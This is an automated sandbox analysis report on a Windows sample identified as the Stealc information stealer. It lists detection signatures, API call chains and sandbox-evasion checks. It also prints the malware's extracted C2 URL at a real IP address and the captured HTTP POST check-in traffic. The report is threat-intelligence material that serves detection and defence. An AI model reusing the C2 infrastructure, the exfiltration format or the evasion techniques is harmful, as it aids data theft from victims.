Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520515
MD5:fb6e05d5c008f119efcdeefe60d6e924
SHA1:76fca4e5da3cff2eee99634b2f442850000ce47f
SHA256:b01a2006b9ca98754e6c54ea5940b99dba53720fd9f0b83a4024a7061723f90d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB6E05D5C008F119EFCDEEFE60D6E924)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7656JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7656JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e10000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T12:53:04.908577+020020442431Malware Command and Control Activity Detected192.168.2.849705185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.e10000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E1C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E19AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E19AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E17240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E17240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E19B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E19B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E28EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E28EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E24910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E1E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E24570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E1ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E23EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 35 30 30 44 33 45 43 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="hwid"706500D3ECC058492808------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="build"save------JJJEGCGDGHCBFHIDHDAA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E14880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E14880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 36 35 30 30 44 33 45 43 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="hwid"706500D3ECC058492808------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="build"save------JJJEGCGDGHCBFHIDHDAA--
                Source: file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
                Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
                Source: file.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D0_2_010BA14D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E09440_2_011E0944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E79ED0_2_011E79ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E40390_2_011E4039
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D502C0_2_011D502C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0126E0980_2_0126E098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113DBD40_2_0113DBD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6A300_2_011D6A30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011ECAC70_2_011ECAC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011A251D0_2_011A251D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D35B90_2_011D35B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E5DB50_2_011E5DB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B0DE90_2_010B0DE9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DD4040_2_011DD404
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E245E0_2_011E245E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D9F770_2_011D9F77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D06080_2_011D0608
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01190E950_2_01190E95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011DEE870_2_011DEE87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114CEE50_2_0114CEE5
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E145C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fychohlw ZLIB complexity 0.9948268103513269
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E28680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E28680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E23720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\42DP348H.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1853952 > 1048576
                Source: file.exeStatic PE information: Raw size of fychohlw is bigger than: 0x100000 < 0x19e800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fychohlw:EW;iljhrjsp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fychohlw:EW;iljhrjsp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d448f should be: 0x1ce396
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fychohlw
                Source: file.exeStatic PE information: section name: iljhrjsp
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AD92A push 4CA49574h; mov dword ptr [esp], esp0_2_012AD9E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AD92A push eax; mov dword ptr [esp], edx0_2_012ADA49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AD92A push 6560EDE0h; mov dword ptr [esp], esi0_2_012ADC42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FE927 push 1D7584A4h; mov dword ptr [esp], esi0_2_012FE94D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E116D push 6D2553E1h; mov dword ptr [esp], ecx0_2_012E11BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D push 3706B6A1h; mov dword ptr [esp], esi0_2_010BA252
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D push 262A28D6h; mov dword ptr [esp], eax0_2_010BA2A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D push edx; mov dword ptr [esp], 25A19BA8h0_2_010BA2BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D push eax; mov dword ptr [esp], edx0_2_010BA34B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010BA14D push edx; mov dword ptr [esp], 71AF9F4Eh0_2_010BA38B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01213979 push ebx; mov dword ptr [esp], edi0_2_0121398D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01213979 push eax; mov dword ptr [esp], 7B4BA17Ah0_2_0121399B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01213979 push edx; mov dword ptr [esp], 6F1FECD6h0_2_012139BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 704BAC81h; mov dword ptr [esp], edx0_2_011E095F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 3DBAA091h; mov dword ptr [esp], edx0_2_011E0969
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 67E0AA7Ch; mov dword ptr [esp], ecx0_2_011E09C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push esi; mov dword ptr [esp], 06263BF7h0_2_011E0A0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push edi; mov dword ptr [esp], esp0_2_011E0AE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 7FB5EC5Bh; mov dword ptr [esp], eax0_2_011E0B57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push edx; mov dword ptr [esp], esi0_2_011E0B83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 2A932AC1h; mov dword ptr [esp], ecx0_2_011E0BE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 0B7C37FFh; mov dword ptr [esp], eax0_2_011E0BFF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push eax; mov dword ptr [esp], ebx0_2_011E0C0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 1950D316h; mov dword ptr [esp], edx0_2_011E0C53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push eax; mov dword ptr [esp], esp0_2_011E0C7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push edx; mov dword ptr [esp], eax0_2_011E0C96
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push ecx; mov dword ptr [esp], esi0_2_011E0DC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 1C760437h; mov dword ptr [esp], ebp0_2_011E0DD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push eax; mov dword ptr [esp], esp0_2_011E0E8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push edx; mov dword ptr [esp], 0D010565h0_2_011E0EB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E0944 push 7A266EC4h; mov dword ptr [esp], ebx0_2_011E0F0A
                Source: file.exeStatic PE information: section name: fychohlw entropy: 7.953428588983157

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13360
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F23C1 second address: 11F23F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790E17D78h 0x00000007 jmp 00007F0790E17D6Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F23F1 second address: 11F23F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F144A second address: 11F144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1834 second address: 11F1870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07913FD82Fh 0x00000007 jmp 00007F07913FD835h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F07913FD830h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1870 second address: 11F1874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F19FE second address: 11F1A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1A02 second address: 11F1A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0790E17D66h 0x00000011 pop eax 0x00000012 jnl 00007F0790E17D6Ch 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1B8A second address: 11F1B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1B8E second address: 11F1B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
